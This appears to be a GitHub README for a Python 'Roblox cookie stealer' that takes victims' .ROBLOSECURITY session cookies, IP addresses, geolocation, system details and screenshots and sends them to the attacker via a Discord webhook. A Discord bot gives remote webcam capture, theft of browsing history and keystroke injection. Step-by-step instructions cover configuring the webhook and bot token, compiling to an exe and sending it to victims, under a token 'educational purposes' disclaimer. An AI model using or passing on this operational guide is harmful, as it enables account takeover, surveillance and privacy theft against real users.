independent-coder / Roblox-Webhooks

A powerful app for taking the ROLOSECURITY cookie from the victim and send it to the hacker from discord Webhooks!

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

R🍪blUx-Grabber

Logo Python 3.11 Discord Webhooks PyCharm Supported Notepad++ Supported Roblox Supported Built with PyInstaller Open Source

What's up everybody! I made a Roblox 🍪 Stealer. The cookie will be sent by a Webhooks on Discord.

Supports more than 19 different Browser.

⚠ WARNING:BEFORE I CONTINUE THIS TOOL WAS MADE FOR EDUCATIONAL PURPOSES ONLY!

Table of Contents 📖

Features Available:

1. View information about the victim's Roblox account: UserName, Robux balance, Premium status, RAP, and Number of friends.

2. Roblox Cookie Grabber.

3. Location: CITY, REGION, COUNTRY (LATITUDE, LONGITUDE).

4. Public IP and Private IP.

5. Computer Information: Computer name, processor, RAM, machine architecture, operating system (OS), OS release, OS version, MAC address.

6. Take a screenshot after 5 seconds.

7. Show and generate an html disclaimer page to the victim. PS: You can modify the html page to troll the victim.

8. And a little tutorial to know how to access the account.

Future Feature:

Nearly available: Have the possiblity of taking a screenshot at any moment.

Email taker.

Password forwarders.

See the opened app on victims' computer.

Troll: Make victim input key INS.

What browser the grabber support ?

The grabber support:

Setup

WebHook Part.

First, create a server private with nobody.

Screenshot 1

Second, go to the settings of the default text channel.

Go to the integration tab and click on webhooks.

Screenshot 2

Add a new Webhook, call it whatever you want and copy the URL.

Screenshot 3

Now save the URL at any places. It will be useful in the future.

Screenshot 4

Discord Bot Part.

You now need to create discord bot but it's very simple just folow the step.

First go to Discord Dev Portal.

Add a new app.

Name it whatever you want, accept the term and create.

Go to bot button, and check these three checkboxes.

Then go up and reset the token and copy it and store it somewhere.

Then go to OAuth2, URL Generator.

Check the bot checkbox.

And copy the Discord Bot invitation.

Then go to this URL.

And allow it to the server we just created.

And authorize. And go to the pythnon part to continue.

Python Part.

First, download the latest version of R0blUx-Gr@bber.py with requirements.bat:

Before you begin to modify, you will need to launch requirements.bat. This will automatically install all the requirements for the program to work.

Now, you will need a text editor like Notepad++ or PyCharm Community Edition.

If you prefer, you can use the default Notepad on your system as well.

Now, open the R0blUx-Gr@bber.py file by right-clicking it and choosing "Edit" with your selected text editor.

Locate line 641 and remove the preexisting text. Replace it with the webhook url that we save before if you dont have an webhook please click here to know how to have one.

Also you need to add your discord bot token line 637, stored since 2 sec if you don't know what im talking about go here

Also the grabber will show an defined html page you can disable it if you want by adding some # to the line 238, 239, 240.

Once you have made the necessary modifications, you can save and close the file. Remember, the script is open-source, so you can customize it further if needed.

If you're ready to launch the attack, you have two options:

  • Compile the script to an executable (exe) file - This is the recommended method, as it simplifies the process for the victims. You can distribute the executable file, and when executed, it will run the attack.
  • Alternatively, you can send the Python file to the victims and have them run it using a Python interpreter. This method requires that they have Python installed on their systems.

Note: An already compiled exe version will be released in the next update, making it even easier to execute the attack.

Compile

Install the compiler

If you are here you want to know how to compile the Roblox 🍪 Stealer.

You will need two things auto-py-to-exe and install.bat .

Here is the step to install auto-py-to-exe.

Installing using PyPI:

To install the application run this line in cmd:

pip install auto-py-to-exe

Put into exe.

Now once you installed auto-py-to-exe.

You need to install RCG-EXE-Builder.exe

If you don't trust me, here is the MD5 and SHA-256 signatures and the source code of the EXE builder (Code by me).

MD5: 510E3079A1CA9F3DAA1DCE03CE463667

SHA-256: 65559EBB2530AA6ACD3CB68E5916E231A0E414D3D83A59F44AA4D5EFFE888F14

Root/Source-Code/Source-code-RCG-EXE-Builder.py

If you still don't trust me do it manually by googling "Compile py to exe"

If you do it manually go to usage.

Once you launch RCG-EXE-Builder.exe, you will need to put the R0blux-Gr@bber in the same location of the EXE file.

Now you put the output directory and optionally add a icon file to the exe.

Once you're ready click Generate EXE, the window should stop responding for 1 minuute, if you have an issue please add an issue Here.

Then go to the output folder and you should see R0blUx-Gr@bber.exe, rename it to whatever you want and send it to the victims.

Now go to usage to know how to use it

Usage.

Now that you have the compiled exe file, you will send it to the victim by discord or an another way.

Once the victim launch the exe you will start receiving some basic info with the roblox cookie using Discord webhook.

And you will receive an screenshot from the victim'pc.

Now you have acess to the bot.

So here the list of the command.

List of Commands
!Help
Need Help ? No problem.
!camcheck
Take a 30 seconds video and send to hacker. 📷
!Bookmarks
Take every bookmarks on the default browser⭐.
!history
Take the history and put it into an csv file and json put into a zip ⬛ 🟧 😏
!insert
Input victims computer Insert key. 😡
!terminate
Terminate the tool running on victim's computer :skull_crossbones:
!clear
Delete message using (!clear NUMBER) because it can be messy !
!SH
Shows up any message using notepad 💻
Here the three types of command !SH save YOUR SENTENCE, !SH display, !SH remove
!SH save
= save your sentence
!SH display
= display your sentence
!SH remove
= remove sentence.txt

Conclusion !

Hey I very like doing this project, With my skill I made this whole code, repository and readme in 2 days !

I really appreciate if you star my project. Tell me if you love it !

Don't be shy to ask any question about this project or another one ! You can find my discord in my bio.

Now I will explain how the code will work.

First, the code will send a message with the webhook from Discord that you provided earlier.

The code will search through all the possible browsers to find the Roblox cookie and then send it on Discord.

Also, the message will provide the name on Roblox of the victim, their public IP address and PRIVATE LONGITUDE LATITUDE COUNTRY CITY AND REGION, how many Robux they have, and how many times their account was created.

And a quick explanation of how to enter the victim's account.

Thank for the people will use my tool and star my project !

About

A powerful app for taking the ROLOSECURITY cookie from the victim and send it to the hacker from discord Webhooks!


Languages

Language:Python 98.9%Language:Batchfile 1.1%